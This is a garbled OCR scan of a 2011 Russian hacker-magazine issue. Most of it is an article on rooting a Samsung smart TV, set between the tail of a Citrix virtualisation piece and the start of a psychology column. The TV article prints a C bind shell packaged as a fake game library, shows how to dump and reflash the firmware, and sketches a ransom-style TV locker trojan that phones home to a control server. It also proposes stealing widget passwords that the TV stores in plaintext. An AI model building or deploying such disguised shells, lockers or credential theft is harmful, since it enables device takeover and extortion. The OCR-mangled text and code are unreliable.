«корпоративной» ОС можно запретить ЕГ5В или ѴѴІ-Еі. Разуме- 
ется, можно настроить и периодичность выгрузки резервной 
копии ОС на сервер. 

Таким образом, основные вычислительные ресурсы располо- 
жены именно на ноутбуке, сервер служит лишь хранилищем 
виртуальных машин сотрудников. Давай рассмотрим, какие 
проблемы может решить использование «Хеп Сііепі:»: 

1. Обеспечить возможность комфортной работы пользователя 
вне офиса, не теряя преимущества ЕпГегргізе-решений, исполь- 
зуемых в компании для обеспечения безопасности. 

2. Экономия на парке компьютеров. 

3. Централизованное управление и хранение рабочих данных 
сотрудников. Решаются проблемы резервного копирования, 
быстрой подготовки рабочих мест, уничтожения данных в 
случае утери ноутбука, шифрования, разграничения доступа к 
аппаратной части для «корпоративной» ОС. 

4. Рабочее место всегда под рукой, быстрое переключение 
между домом и работой, стимулирование сотрудников исполь- 
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зовать защищенную корпоративную среду даже дома. 

Заметим, что последний пункт особенно важен для топ- 
менеджеров, которые, для обеспечения комфорта собственной 
работы, часто являются причиной использования компромис- 
сов с точки зрения защиты. 

Облако 

Как применить Хеп Зегѵег для решения нашей задачи — обеспе- 
чения безопасности всех мобильных устройств пользователей? 
Ответ: Сйгіх Кесеіѵег. Это программное обеспечение, которое 
работает практически под всеми платформами (в том числе и 
мобильными, например Апбгоісі и Ю5) . Сйгіх Кесеіѵег позволя- 
ет получить доступ к виртуальной ОС или приложениям из нее 
практически с любого устройства. На сервер, имеющий доступ 
к интернету, необходимо установить Эезкіюр Эеііѵегу Сопілоііег, 
который будет отвечать за удаленный доступ к ОС. В саму ОС 
устанавливается агент Сйгіх ѴЭА, который регистрируется в 



► 126 



ХАКЕР 06 /149/ 201 1 









Переключение между ОС 

Эезкіюр Оеііѵегу СопНоПег, и данная ОС становится доступна 
извне, будь то виртуальная система или установленная на 
реальном железе. На клиентское устройство нужно будет уста- 
новить Скгіх Кесеіѵег, тогда пользователи смогут подключаться 
к необходимой ОС и нормально работать. Такой механизм по- 
зволяет получить доступ ко всем приложениям практически из 
любого устройства, Місгозоіт (Жісе 2010 на телефоне — уже не 
фантастика. Однако, чем же это лучше обыкновенного доступа 
через КНР? 

Если использовать все возможности продуктов Хеп Зегѵег и Хеп 
ОезкШр, можно создать несколько шаблонных ОС для каждой 
из групп пользователей, данные которых и ОС будут храниться 
раздельно, что позволяет экономить дисковое пространство. 

И тут мы переходим к еще двум продуктам компании Скгіх — 
Скгіх ХепѴаик и Скгіх ХепАрр. Эти программные продукты 
позволяют использовать корпоративные приложения на любом 
компьютере. Предположим, у нас есть мощный сервер с парком 
виртуальных машин для разных групп пользователей. Скгіх 
ХепАрр позволяет получить доступ к приложениям из корпора- 
тивной среды, будто бы они установлены на личных компьюте- 
рах пользователей. Объясню на примере. Бухгалтер с помощью 
ХепАрр получает доступ к «1С Бухгалтерии», установленной на 
его рабочем компьютере, как будто бы к приложению, которое 
установлено на его персональном. При этом получается как бы 
«приложение по заказу», так как используются вычислитель- 
ные ресурсы (и данные) сервера, поэтому после прекращения 
использования приложения на домашнем компьютере никаких 
данных не остается. Скгіх ХепѴаик — это защищенное корпо- 
ративное хранилище данных, которое также помогает исполь- 
зовать виртуализированные приложения. Для шифрования 
используется АЕ5 с 256-битным ключом, а политика безопас- 
ности определяет, какие именно программы получат доступ к 
этому хранилищу. По умолчанию доступ дается «виртуальным» 
приложениям. Буфер обмена можно блокировать политиками 
безопасности. Как и в Хеп Сііепі:, ХепѴаик можно настроить на 
принудительное удаление всех данных — например, в слу- 
чае кражи ноутбука или его компрометации. Таким образом, 
на домашнем или мобильном компьютере можно безопасно 
пользоваться «рабочими» приложениями с использовани- 
ем аппаратных ресурсов удаленного сервера. Это позволяет 
осуществлять удаленную работу даже когда для нее требуются 
немалые вычислительные ресурсы, недоступные мобильным ПК, 
и осуществлять ее безопасно. Конечно, существуют концепты 
вредоносного ПО, которое способно вторгаться в виртуальную 
среду, но реальных приложений пока не встречалось. Минусом 



©' +* в б* И* 




Установка ОС в ХепСІіепі 



такой схемы является потребность в мощном сервере и зависи- 
мость от скорости доступа в интернет. Кроме решения проблем 
мобильных рабочих станций можно применять парк тонких 
клиентов на рабочих местах пользователей, особенно если их 
работа не связана с потребностью в мощных вычислительных 
ресурсах. Часто экономически это более чем оправдано. 

Итак, плюсы: 

1. Возможность безопасного использования данных и программ 
из рабочей среды на домашнем компьютере или ноутбуке. 

2. Возможность использования рабочих ресурсов и мощностей 
удаленно. 

3. Возможность использования тонких клиентов. 

4. Кроссплатформенность. 

Минусы: 

1. Усложнение инфраструктуры. 

2. Необходимость мощного серверного оборудования. 

3. Недостаточная «обработанность» технологии. 

Итоги 

В статье были рассмотрены новые технологии и возможно- 
сти, которые предоставила компания Скгіх. Как оказалось, 
тандем (Сергей, сейчас принято говорить «правящий тандем» 

:) — прим, ред.) из программной и аппаратной виртуализа- 
ции позволяет решить множество задач, в том числе и с точки 
зрения обеспечения защиты информации. Немаловажно, что 
эти средства защиты еще и не вызывают особенных неудобств у 
пользователя, -г 
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ѳ Взлом встраиваемых систем и, в частности, различной бытовой 
техники - это очень интересная тема и перспективное направление. 
Сегодня я покажу тебе это на примере телевизора Зашзипд І.Е650В. 
Все в этом телеке почти стандартно - 6Ы11/ипих Р ВизуВох, - но 



чтобы получить к нему доступ, мне 

Наши задачи 

Первым делом нужно обозначить конкретные задачи, которые я 
перед собой ставил. Главная задача — исследовать телевизор и 
осуществить локальный взлом: получить полный доступ к киш- 
кам нашего телека и разобраться с тем, как он функционирует на 
уровне ОС. Побочная задача — поразмышлять на тему трояна для 
зомбоящика и прикинуть, как подобный трой мог бы выглядеть. 

Подключаемся 

Первичный осмотр телевизора показал, что на борту устройства 
есть Еібегпеі-порт. Это очень важное обстоятельство, ведь если у 
телевизора есть сетевой интерфейс, то наверняка есть и сетевые 
сервисы. Выбрав ручную настройку сети, я назначил телевизору 
статический адрес 1 92.1 68.1 .2, а своему ноутбуку - 1 92.1 68.1 .1 . 
После этого я соединил патч-кордом телек с ноутбуком и прове- 
рил связь — телевизор отлично пинговался. 



пришлось изрядно потрудиться. 



Для сбора информации об открытых портах и запущенных сетевых 
сервисах я традиционно воспользовался сканером портов птар: 

$ птар -А 192.168.1.2 

ІМтар 5сап перогі: -Рог 192.168.1.2 
Нозі: І5 ир (0.000195 1а1:епсу) . 

АН 1000 БсаппесІ ропѣв оп 192.168.1.2 аге сіовесі 
МАС АсІсІге55: 00 : 12 : РВ : 89 : 50 : ЗЕ (5атвип§ Е1ес1:гопіс5) 

05 сІе1:аіІ5: І_іпих 2 . 6 . 14 - 2 . 6 . 16 „ І_іпих 2 . 6 . 17 (Мапсігіѵа) 

Честно говоря, я и не ожидал увидеть тут открытый телнет, так 
что подобный результат меня не сильно обломал :). Нет открытых 
ТСР-портов — ничего страшного. Может, ІЮР-сервисы порадуют? 

# птар -5У 192.168.1.2 
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Структура файловой системы 
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Информация о процессоре 



І\Ітар5сапгерог1:-Рог 192.168.1.2 
Нобі: І5 ир (0.ѲѲѲ2І5 Іаіепсу). 

N01: бііомп: 997 сіобѳсі рогіБ 
РОКТ 5ТАТЕ 5ЕКѴІСЕ 

1024/исІрореп | бііегесі ипкпомп 
1026/исІрореп | бііегесі ыіп-грс 
1900/исІрореп | бііегесіирпр 

МАС Асісігѳбб: 00 : 12 : РВ : 89 : 50 : ЗЕ (Батзип^ Еіѳсігопісб) 

Засветился ІіРпР, уже кое-что. Эта технология является ядреной 
помесью НИР и ХМІ_ для связи и управления устройствами. В 
данном случае ІіРпР используется для поддержки ВІ_ЫА Шідііаі 
Ыѵіпд Ыеіѵѵогк АШапсе) — технологии, позволяющей передавать 
различный медиа-контент по сети между совместимыми устрой- 
ствами, например играть видео или музыку через ѴѴі-Рі/ЕіЬегпеІ 
с ВІ_ЫА-сервера. Отметим это обстоятельство и отложим пока 
ІіРпР в сторону, нужно завершить исследование. 

Осмотр 6111 

Больше всего мне хотелось получить полноценный доступ к опе- 
рационной системе зомбоящика, идеальным вариантом была бы 
консоль с рутовыми правами :]. 

Размышляя об этом, я решил побродить по меню телевизо- 
ра, вдруг там есть что-нибудь интересное? Среди различных 
«Галерей» и «Музыки», я нашел интересный пункт «Игры». 

Идея была стандартной: наверняка кроме предустановленных 
гамес Затзипд сделал возможность установки новых игр и даже 
предоставил 5БК для их создания. Осталось понять, как новые 
игры устанавливаются, а на чем они написаны и в каком форма- 
те — не столь важно. 

Само собой, играть я собрался в занимательную игру под назва- 
нием ЬіпбзЬеІІ. После минутного поиска я попал на Затзипд 
АррЗіоге. Зарегистрировавшись, я загрузил первую попавшую- 
ся бесплатную игру. Из интересного в файле с игрой имелись: 
хті-файл сітеіа.сіаі - тапТезІ-файл, с языковыми настрой- 
ками и описателями файлов игры; рядом находится дате.зо 
— збагесШЬгагу, в ней и лежит код запуска игры. Была еще куча 
файлов — ресурсы игры и прочие бинарники. Первым делом мне 
захотелось узнать, для какого процессора собрана игра: 

$ 61е дате.зо 

дате.зо: ЕІ_Р 32-Ьіі І_5В вііагесі оЬдесЩ АКМ, ѵегзіоп 1 (5У5Ѵ), 



сіупатісаііу ІіпкесІ, по* БігірресІ 

Все ожидаемо — АРМ! Где мультимедиа, там и эти трудяги. 
Просматривая информацию из этой библиотеки, вывод о Ь ] сі и пп р , я 
заметил функцию Оате_Маіп, которая, как оказалось, и вызыва- 
ется при загрузке игры. Прежде чем писать что-то для получения 
доступа к системе, нужно было разобраться, каким образом игры 
загружаются на телевизор. Поместив директорию с файлами игры 
в корень флэшки (ГАТ32) и подключив ее к телевизору, я уви- 
дел меню автозапуска, предлагающее мне обновить ПО или же 
посмотреть содержимое через СопІепіЫЬгагу. В СопІепіЫЬгагу: 
источник — флешка, пункт меню — «Игра», в списке директорий — 
«Директория с игрой -> Воспроизвести». Готово, игра загрузилась. 
Теперь таким же образом нужно запустить нашу хек-игру. 

В і псІзГіеІІ я взял самый элементарный, никаких особых выкру- 
тасов здесь не требуется, главное — скомпилировать его как 
збагесШЬгагу и объявить функцию Оате_Маіп(). 

Наш бинд-шелл 

#іпс1исІе < зіісііо . М > 

#іпс1исІе <5*сІ1іЬ. б> 

#іпс1исІе <зі§па1.1і> 

#іпс1исІе <5уз/50ске1:.1і> 

#іпс1исІе <пе*іпе1:/ір. б> 

ехіегіі Сате_Маіп; 

ѵоісі Сате_Маіп() 

{ 

іп* істр_Боск, 5Ііе11_50ск, сіі; 

бігііс* зоскасІсІг_іп біп; 

5Іп.5Іп_-Раті1у = АР_]ЖТ; 

5Іп.5Іп_асІсІг.5_асІсІг = ІМАОРК_АМУ; 

БІп . 5Іп_рор1: = Іі1:оп5(1337); 

5Ііе11_50ск = 50ске*(РР_]ЖТ, 50СК_5ТКЕАМ, ІРРКОТО_ТСР) ; 

ЬіпсІ(5Ііе11_50ск^ (БІігисіБОскасІсІг *)&біп, бііѳоіДбіп) ) ; 

1із1:еп(5Ііе11_50ск^ 1); 

сіі = ассер*(5Ііе11_50ск, МІІІ_І_, 0); 

сІир2 ( сП, 0 ); 

с!ир2 ( сіі, 1 ); 
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Реанимация устройства 




Консольный кабель 



Перед тем какзакатывать исправленные дампы файловой системы, 
нужно узнать, как восстанавливать девайс в случае неудачной 
записи. Для этого у телевизора имеется специальный разъем, 
выполненный под обычный 3.5-миллиметровый джек. Собствен- 
но, терминальный кабельи представляет собой аудио-кабель, у 
которого с одной стороны джек, а с другой - разъем П5-232. Имеется 
два варианта восстановления: 

Через консоль. 

1. Подключаем телевизор к компьютеру при помощи кабеля. 

2. Подключаемся ктелевизорус помощью любой терминальной 
программы. 

3. Включаем поддержку изб, запустив стартовый скрипт (нужно для 
изЬ-ІІазб памяти): /ІіЬ/тосІиІез/гс . Іосаі. 

Включаем поддержку 1\1А1\Ю-памяти и файловой системы гіъ: 

# іпзтосі /1іЬ/тосІи1е5/-р5г. ко 

# іпзтосі /ІіЬ/тосІиІез/г-Рз . ко 

# іпзтосі /1іЬ/тосІи1е5/-р5г_5І:1 . ко 

Стираем кривой образ, например: Ьті.егазе /сІеѵ/Ьт10/5. 
Записываем ранее скопированный, оригинальный или исправлен- 
ный образ, находящийся на флэшке: Ьті.гезіоге /сІеѵ/Ьт10/5 / 
сИ:ѵ/изЬ/5СІ1/Іта§е. іт§. 

Через загрузчик и-Ьоо*. 

В самых сложных ситуациях необходимо восстановление через 
загрузчик и-ЬооТ Первым делом нужно зайти в сервисное меню 
телевизора, для чего требуется при выключенной железке быстро 
нажать кнопки на пульте ДУ [ІІМРО] [МЕШ] [МІЯЕ] [РОѴѴЕВ]. За- 
тем в пункте «СопДоІ -> ЗиЬорііоп -> Вз232 іаск» нужно выбрать 
«ОеЬид», а в меню «Сопігоі -> ЗиЬорІіоп -> ѴѴ аісббод» нужно вы- 
рубить «сторожевого пса», чтобы он не перезагружал устройство 
во время доступа к и-ЬооТ 

Дампы блоков памяти нужно разместить на флэшке по особым 
правилам: 

• файловая система на флешке должна быть ЕАТ32; 

• дампы должны находиться в директории /ирсіаіе; 

• имена дампов должны соответствовать приведенным ниже: 

/сІеѵ/Ьт10/1 опЬооі.Ьіп 
/сІеѵ/Ьт10/2 и-Ьооі.Ьіп 



ІЪБооЪ ІЛ*6 (Нес 12 2008 - 15:55:34) 

дам: 128 МБ 

************ сЗеиісе тРо 
пРдеРегбШІк = 128 
пРдаРегШСВІк = 256 
п&йеРегРд = 8 
пГЬліШЪВІКе = 994 

ОгЫ-ШВІЬоаЬіпд] мосіе / сік = 5 / 50№іі 

*** + + ***+**+* + *** + + + + **+ + ***+**■* + +****** *** + + *##* 

Т туВМЦ 0] ореп виссевз 
елы_геІосаЬе.зрес 
Зиссезз Іоасіапд ратЫкіоп 
Епміголйепѣ ВаЪа Іоасішд зиссеез 11 
N 0 еіНегпек Гоипс). 

Іп; 5 еі"іЫ 
Оиі: зепаі 

Егг: зегіаі 

Иеы РТ 18138*0 

Ни апу кеу (о зЬор аиЬоЬйок; О 



ВООТРОН БЕВ№ ЕЕббЮИ 

1. ЕМІШШЛ 5ЕТИР 

2. 5Н0У РЙКТ1ТШН 

о, іимр то ивоат ршрт 

г. ЯЕВООТ 



5ЕІЕСГ СОММйЩ; 



Меню загрузчика 

/сІеѵ/Ьт10/3 иЬооі_епѵ. Ьіп 
/сІеѵ/Ьт10/4 Тпм.Ьіп 
/сІеѵ/Ьт10/5 Іта§е 
/сІеѵ/Ьт10/6 гооіТз . іт§ 

/сІеѵ/Ьт10/7 Ьооі.іт§ 

Теперь можно соединяться. Подключив кабель и открыв консоль, 
включаем зомбоящик. В консоли должен появиться лог загрузчи- 
ка, а в конце — сообщение «НИ: апу кеу Іо зіор аиіоЬооІ» . В меню 
лоадера выбираем пункт под номером 0, это запустит консоль. Для 
ознакомления с доступными командами можно набрать «Иеір». 
Подключаем изЬ-флешку и сканируем устройства: ЬЬтизЬ . 

Теперь выбираем номер блока, который нужно восстановить - 
например, кегпеіітаде (4). Далее вводим имя файла, в котором 
содержится образ ядра (в нашем случае - «Ітаде»), после этого 
начинается запись образа ядра в память. По окончании перезагру- 
жаемся и проверяем, как прошла операция. 



сІир2 ( сіі, 2 ); 

ехесі ( "/Ьіп/біі'П "бЬ", І\ІІЛ_І_ ); 

} 

Компиляция элементарна: 



Запуск злокода 

Для запуска бинд-шелла нужно положить в корень флэшки папку с 
файлами дате. во (который получили на прошлом этапе]и сітеіа.сіаі 
(его можно взять от любой другой игры). 

После этого нужно подключить флешку к телевизору и запустить игру 
в меню автозапуска. В качестве результата работы бинд-шелла ты 



агт-1іпих-§ссЬіпсІ5Ііе11.с -ТРІС -збагесі -о §ате.зо 

► ізо 
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Список процессов 



должен получить черный экран на телевизоре и открытый шелл на 
1337 порту. Успех работы бинд-шелла проверяется простой командой: 

$ Іеіпе* 192.168.1.2 1337 

Имея опыт работы со встраиваемыми системами, я сразу подумал, что 
в устройстве используется ЬизуЬох — популярный простенький шелл 
с набором основных консольных утилит. Запустив эту оболочку коман- 
дой ЬизуЬох, я увидел традиционный Ьеір, в котором была информа- 
ция об ОС и список доступных программ, включающий даже ѵі. 

Внутренности системы 

В корне файловой системы я сразу заметил кучу т1сІ_*-директорий: 
это точки монтирования блоков НазЬ-памяти. Версия ОС как всегда 
на своем месте: 

# саі: /рпос/ѵег5Іоп 

[28_64_512] І_іпих ѵегзіоп 2.6.18_5ЕІ_Р-АКМ (квЬ921@5р) (§сс 
ѵегзіоп 4.2.0 20070514 (6РІ_2) (5ЕІ_Р 4. 2.0-3.0. 5. сизТот 2007- 
10-31(14:53))) #81 РКЕЕМРТ Моп Зип 22 10:10:31 К5Т 2009 

Интересно взглянуть и на файл раззѵѵб: 

# саі: /еІе/раББмеІ 

гооТ : :Ѳ:0:Коо-Щ , , :/:/Ьіп/бЬ 




ол / зчмазІтР* (го) 

йп /ргас ргвс (ги) 

поля ап /і-уг С!#*? зузі-з Іги) 

ежу* т ЪярТі (ги) 

ол /бКѵ Ь&ъ (ги) 

/гіеѵ/іЬяЙ? сп /тКб_ЪааІ Іуре ациазІѵТЕ (го) 

тгк 0л /ві^.г-ач (гу) 

/гііѵ/іЪІп/14 <Уі /ниЦгмгм (де гН (ги) 

/сІйѵ/іЬяЭЁ ил /й*.^й.хй Іурс г^а (г(?) 

ЛйѵЛЬпІЭ йі Іуре вдиісііі'і (го) 

/гіеи/ЧНО/ІЗ ол /лЬЗ_\ 1 і Ь Тур? і'Ре (ги) 

/гіеѵ/дѣ) 0 /і 5 оп /пЬгі.сапѣіпІЕ Ьурв гГя (гы) 

*п /ви.йймп Ьуре гН (ги) 

/Аѵ/ПГО/12 ол |Г^:, Кч?* гН (ги) 

/гіеѵ/яіЮ/І? оп іур» гР* (гу) 

гюгч- ол /рггсЛлігДрзЬ ѣурѳ изЬРз (гн) 

/йаи/«дв о л Аііѵ/цзЬ/кі* т.чре ѵРле, (ги, еупс , Г мік.-ОО??, \ 
с&н5кг0О22,ркІард5егер43? , ІшЬаг за I: ~и1+'Н И вЫр" "ші меО 3 



Вывод команды тоипі 

Вот так, даже без пароля. Подробнее о железе можно узнать из лога 
загрузки, да и вообще туда следует заглядывать всегда, помогает 
понять общую картину строения девайса: 

# сІте 5 § 

Теперь интересные части лога: 

<5>СРІІ: АКМѵб-сотраІіЬІе рпосеББОГ [41ѲТЬ767] гѳѵібіоп 7 
(АКМѵбТЕЗ ) , сг=00с5387Т 

<4>МасЬіпе : 5агпБип§-50Р83 Еѵаі. ВоагсІ(64Ьі1: 512МВ) 

<6>50Р83 Соге Сіоск: бѲѲ.ѲМЬі 
<6>50Р83 00К2 Сіоск: 399.937МЬг 

А телевизор оснащен неплохо: АПМѵб бООМЬг, ОРРІІ 400МИ2 512МВ. 
Буквы «ТЕЗ» здесь означают следующее: 

• Т: Поддержка ТНЫМВ-режима процессора. В этом режиме испол- 
няются инструкции длиной 16 бит (в нормальном режиме - 32]. 
Режим этот нужен для оптимизации программ по размеру. 

• Е: ЕпЬапсесІ 05Р іпзігисііопз. 

• 3: Загеііе йВХ (Оігесі Вуіесобе еХесибоп) — семейство замеча- 
тельных технологий, разработанных компанией АРМ для аппарат- 
ного ускорения выполнения Заѵа байт-кода. В процессор добавля- 
ется специальный сопроцессор, который аппаратно преобразует 
байт-код в инструкции основного процессора. В результате осу- 



Вывод команды ат 



# СІР -Ь 
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ществляется значительное ускорение выполнения Заѵа-кода. 

В списке процессов не было почти ничего интересного, за исключе- 
нием процесса ехейЗР — это управляющая программа. 

Список модулей ядра: 



# І5ГПОСІ 
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Распаковка 

Корневая файловая система распаковывается элементарно: 

$ иг^иа5ІтР5гоо1:-р5 . іт§ 

А как быть с /тІсІ_ехе? Файловая система РР5 создана на базе 
РАТ16, поэтому ничего распаковывать не требуется, нужно просто 
ее смонтировать: 

$ тксІігт1:сІ_ехе 

$ тоипі: т1:сІ_ехе . іт§ . /т1:сІ_ехе -о Іоор 
$ І5 -Іа т1:сІ_ехе 

Теперь у нас есть возможность изменять любые данные внутри 
этих дампов: например, можно легко сменить ненавистные звуки 
включения/выключения устройства (/тІсІ_аррсІаІа/ге5оиг5е) или 
перенастроить значение клавиш пульта ДУ (/т1;сІ_ехе/І пбо Ы п к/ 
кеусопіід). 



Сверху вниз: первые 2 модуля — драйверы фирменных ѴѴі-Рі адап- 
теров Затзипд. Компания специально убрала поддержку сторонних 
адаптеров, чтобы потребителям пришлось покупать «родные» кар- 
точки по высокой цене. Следующие пять модулей реализуют под- 
держку изб; далее идет драйвер сетевой карты; заппсігѵ — драйвер 
телевизора; следующий по списку — модуль поддержки файловой 
системы Затзііпд, Ізг* — модули доступа к памяти. 

Файловая система 

Руководствуясь данными тоипі, Ф и содержанием файла /збіп/ 
ирсІаІе.зЬ, я собрал полезную информацию о структуре файловой 
системы нашего телевизора: 

• /беѵДЬтІб, здиазЫз, го, / — корневая файловая система; 

• /беѵДЬтІ.7, здиазМз, го, /тІсі_ЬооІ — содержит управляющую про- 
грамму МіпісотСігІ, несколько стартовых скриптов и модули ядра; 

• /сі еѵ/іЬт 18, гіз, го, /тІсІ_ехе - содержит множество файлов, в 
том числе управляющую программу ехейЗР, драйвер затсігѵ.ко, 
библиотеки; 

• /беѵЛЬт19 здиазЫз, го, /тІсІ_аррсІаІа - содержит служебные 
файлы; 

• /тісНІіЬ — МебіаСопІепІ — галерея, игры и прочее; 

• /тІсі_сІо\л/п — содержит загруженные виджеты; 

• /сЙѵ/изЬ/зсІ* — точки монтирования изЬ-Иазб. 

Как видно, тут используются два типа ФС: эдиазФз и Дз. ЗдиазЫз 
предоставляет доступ к данным только в режиме РеасЮпІу, 
поэтому для модификации данных нужно слить дамп на внешний 
носитель, распаковать, изменить данные и залить исправленный 
образ назад на устройство. 

Заметив среди точек монтирования свою флешку, я решил сдам- 
пить на нее все интересное для дальнейшего изучения и модифи- 
кации. Первым делом я забрал дамп корневой файловой системы: 

# саі: /сІеѵ/1:Ьт16 > /сІ1:ѵ/и5Ь/5СІа/гоо1:-р5 . іт§ 

Сдампив по аналогии все что было можно, я отправился бродить 
по директориям. Вот наиболее интересные места и файлы, кото- 
рые я обнаружил: 

• /тІсІ_ехе/6АМ Е_І_І В/ — 50І_-библиотеки, используемые играми 
для вывода звукаѴрафики; 

• /тіс^ехе/іпіъипк/кеусопіід — биндинги клавиш пульта дистан- 
ционного управления, при просмотре содержимого сразу видно 
«костыль» — биндинги к клавишам обычной клавиатуры; 

• /тІсІ_аррсІаІа/ге5оиг5е — звуки включения (оп.трЗ), выключе- 
ния ЫбтрЗ), сброса до заводских настроек (бас1;огу_ге5е1;_ЬеІІ. 
трЗ) и звук, проигрываемый при тесте (зеІі.трЗ). 



Троян для телевизора 

Речь пойдет только о концепции трояна, никакого законченного 
решения здесь нет. Моей целью является просто пофантазиро- 
вать на эту тему и показать, как примерно может выглядеть вре- 
доносный софт для современных телевизоров. Прежде всего, что 
вообще может делать такой троян? Вот сходу три годные идеи: 

1. Блокиратор телевизора 

Все помнят веселый замес с троянами типа ѴѴіпІоск. Тупой софт, 
блокирующий работу компьютера и предлагающий снять огра- 
ничения платной ЗМБ’кой, позволил злым парням заработать 
миллионы долларов. Ничто не мешает развить эту идею на новые 
платформы, и телевизоры — точно не худший вариант для этого. 
Представь: «Телевизор заблокирован, для разблокирования 
отправьте зтз на номер ХХХХ». Как ты скоро убедишься, написать 
такой «троян» довольно просто. 

2. Рекламный трой 

Идея простая — классическая абѵѵаге, рекламный трой, показы- 
вающий рекламу во время просмотра телека или использования 
меню. 

3. ББоБ/спам-бот 

Любой современный телевизор — это прежде всего обычный 
компьютер на базе Ыпих. И, само собой, он легко может выпол- 
нять любой привычный троянописателям функционал наподобие 
рассылки спама, участия в ООоЗ-ботнетах и так далее. 

Теперь расскажу, как подобные трои могут работать. В каче- 
стве примера я решил взять блокиратор: это довольно простой 
и показательный пример. Для вывода графики в телевизоре 
используется библиотека 80І_. Документация к этой библиотеке 
есть и на русском языке. Все стартовые скрипты расположены 
на блоках с ПО-доступом, без правки дампов не обойтись. Но 
есть еще один вариант — автозапуск через виджеты или игры. 

Не обязательно инфицировать игру, можно просто переиме- 
новать дате. 50, а вместо него положить рядышком ѵѵгаррег с 
полезной нагрузкой, который в форке запустит игру, чтобы не 
нервировать пользователя. 

Итак, принцип работы трояна. Стартовав, первым делом 
Фгк’аемся на 2 процесса: первый будет выводить графику, второй 
— отстукиваться на управляющий сервер. Инициализация графи- 
ки в телевизоре должна проходить примерно таким образом: 

#сІебпе ѴЮЕО_Х 1920 

#сІебпе ѴЮЕО_Ѵ 1080 

#с1ебпе ѴЮЕО_ВРР 32 
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Окно программы УРпР-Іпзресіог 



#с1е(ппе 5СКЕЕЫ Р І_АС5 в 



Ло§ = ■РорепСѴсІеѵ/ктБб" ^ "а+"); 



іпі: іпі1:_ѵісІео(ѵоісІ) 

{ 

і-Р(501_Іпі1:(501_ІМІТ_ѴІ0Е0) == -1 ) 

{ 

ргігтЩПо^ "Раіі іл/ііб 50І__Іпі1:: %з.\п", 50І__Се1:Еггог( ) ) ; 

геііигп 0; 

} 

а1:ехі1:(50І__(2иі1:) ; 

і-р( ! (зсгееп = 50І__5е1:ѴісІеоМосІе(ѴІ0Е0_Х, ѴЮЕО_Ѵ, 

32, 5СКЕЕІ\І_РІ_АС5))) 

{ 

-рргіп1:-р(По§, "Раіі ш/Ыі 50І__5е1:ѴісІеоМосІе: %з.\п", 
50І__Се1:Еггог()); 

геііигп 0; 

} 

геііигп 1 ; 

} 

Далее нужно вывести сообщение вроде «Телевизор заблокирован, 
отправьте 5М5...». Проще всего загрузить изображение с этим тек- 
стом, плюс можно еще и пофантазировать вдоволь. Делается это 
очень просто: 

іпі: сІгам_іта§е() 

{ 

іТ(!(іта§е = 501_1оас1ВМР( ,, /пт1:с1_с1оып/1оскег/-Рискир.Ьтр"))) 

{ 

ргіпІі-РС'РаіІ іл/ііб І_оасІВМР: %з.\п", 50І__Се1:Еггог( ) ) ; 



геііигп 0; 

} 

501_В1і1:5ип-Расе(іта§е, N1111, зсгееп, ИІІИ); 

геііигп 1 ; 

} 

Функция 801_ВШ;8и гіасеО «накладывает» загруженное изображе- 
ние на экран. Графическая часть трояна готова. С сетевой частью 
проблем не будет — обычные сокеты, никакой экзотики. 

Недостатки Іпіегпеі@ТѴ 

В оболочке телевизора есть интерфейс «ІпІегпеІЙТѴ» — это свое- 
го рода каталог интер нет- виджетов: АссиѴѴеіЬег, ѴоиІиЬе, Тѵѵіиег, 
РасеЬоок. Я поставил Тѵѵіиег: мне было интересно посмотреть, как 
тут все устроено в плане безопасности. 

Вбив свой логин с паролем в виджет Тѵѵіиег, я зателнетился к теле- 
визору, чтобы поискать, как хранятся пароли от моего твиттера. 
Исследуя каталог /тІсІ_сІоѵѵп/сопптоп, я нашел папку с многообе- 
щающим названием ѴѴібдеіМдг. Внутри лежали файлы србаіаі .баі 
и ІосаІІсІ. баи Как выяснилось, именно в этих файлах и хранились в 
открытом виде пароли от виджетов: 

# саі ІосаІІсІ .баи 

бт 1111 србаіаі.сіаи 

# саі срсіаііаі.сіаі: 

Тміииег НеІІМіІіиіаРискІІАП 

Поясню немного назначение файлов: ІосаІІсІ содержит параметры 
«общей» учетной записи, по одной на строку. Формат прост — 
ІодіпфітраззѵѵсНіІе. 

Файл с рсіаіа N (где N — номер «общей» учетной записи, этих 
файлов может быть несколько), содержит пароли к виджетам в 
открытом виде. Все, теперь ты можешь добавить к нашему «троя- 
ну» функционал для кражи сохраненных в телевизоре паролей от 
интернет-сервисов, т 
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■ ■ Оксана Андреева (огіуапагахрзусЬо.ги) 

Андрей Матвеев ІапсІгизНоскгагеаІ. хакер, г и ) 




Р5УСН0: 

КАЛЕЙДОСКОП ИЛЛЮЗИЙ 

Зачастую все не так, как кажется... или ностальгия по статьям Криса Касперски 

Даже будучи самымтрезвым и проницательным циником с неверо- 
ятно высоким Ю,ты никогда не сможешь воспринимать реальность 
на 100% объективно. Хочешьзнать, почему? 



Что мы знаем об иллюзиях, кроме того, что они являются субъектив- 
ными и вставляют чуть меньше, чем галлюцинации? Да практиче- 
ски ничего. А что мы будем считать иллюзией? Нечто, что не соот- 
ветствует реальному положению вещей, частично или полностью. 

И в этом разрезе почти все можно считать иллюзией, так как даже 
трехмерные объекты воспринимаются только со своего угла зрения, 
и то, что шар — это шар, а не плоский круг, мы домысливаем уже 
сами, исходя из опыта осязания и расположения теней. 

Физиологическая подоплека 

В одной из прошлых статей мы говорили о том, что наш мозг 
работает не на 100%, а где-то на 7-10%, чтобы не переистощаться. 
Иллюзии — это как раз адаптационная функция мозга, реализуе- 
мая через органы чувств, которые воспринимают не все подряд, 
а только то, что нужно для выживания. Причем «выживать» нам 
приходится во многих направлениях, о которых сейчас поговорим 
подробнее. 

Зрительные иллюзии 

Наши глаза подобно сканерам совершают считывающие движения 
и передают информацию в мозг. Мозг на основе этих данных строит 
целостную картинку, исходя из уже имеющегося опыта. Не всегда 
можно разглядеть все подробности видимого изображения, поэтому 
мозг сам дорисовывает недостающие детали, а иногда и вообще 
дополняет такими, которых нет в помине, но очень хочется увидеть. 
Классический пример — рис. «Дельфины или...», где взрослый 
человек увидит обнаженных людей, а маленький ребенок — дель- 
финчиков, ведь другого опыта у него нет, так что его мозг сведет 
изображение к знакомому образу. Зрительные иллюзии вызваны 
механизмами, которые отвечают за постоянство видимых форм и 
размеров. Существуют различные виды иллюзий: 

• физиологические — например, распространение возбуждения по 
сетчатке, которая отвечает за восприятие светлых предметов на тем- 
ном фоне как более крупных, чем таких же черных на светлом фоне; 

• вертикальные линии кажутся длиннее, чем горизонтальные такой 
же ДЛИНЫ; 

• иллюзия контраста (иллюзия Эббингауза), при которой один и тот 
же предмет воспринимается как более крупный среди маленьких 
фоновых предметов и как более мелкий — среди больших; 



